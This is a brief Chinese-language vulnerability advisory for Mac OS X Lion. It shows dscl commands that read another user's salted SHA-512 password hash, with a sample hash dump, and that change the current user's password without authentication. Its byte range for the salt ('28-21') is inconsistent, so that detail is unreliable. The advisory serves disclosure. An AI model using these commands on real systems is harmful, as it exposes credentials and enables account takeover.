漏洞起因
访问验证错误
危险等级
低
影响系统
Apple Mac OS X Lion
不受影响系统
危害
本地攻击者可以利用漏洞获得敏感信息或更改其他用户密码。
攻击所需条件
攻击者必须访问Apple Mac OS X Lion。
漏洞信息
Apple Mac OS X Lion是苹果公司新发布的操作系统。
攻击者调用目录服务,执行"$ dscl localhost -read /Search/Users/bob"命令可获得类似如下数据:
dsAttrTypeNative:ShadowHashData:
62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060
SHA512 hash存储在32-96字节之间,Salt存储在28-21之间。
使用"$ dscl localhost -passwd /Search/Users/bob"命令,攻击者无需验证更改当前登录用户的密码。
测试方法
厂商解决方案
目前没有详细解决方案提供:
http://www.apple.com/macosx/
漏洞提供者
Defence in Depth
0 条评论。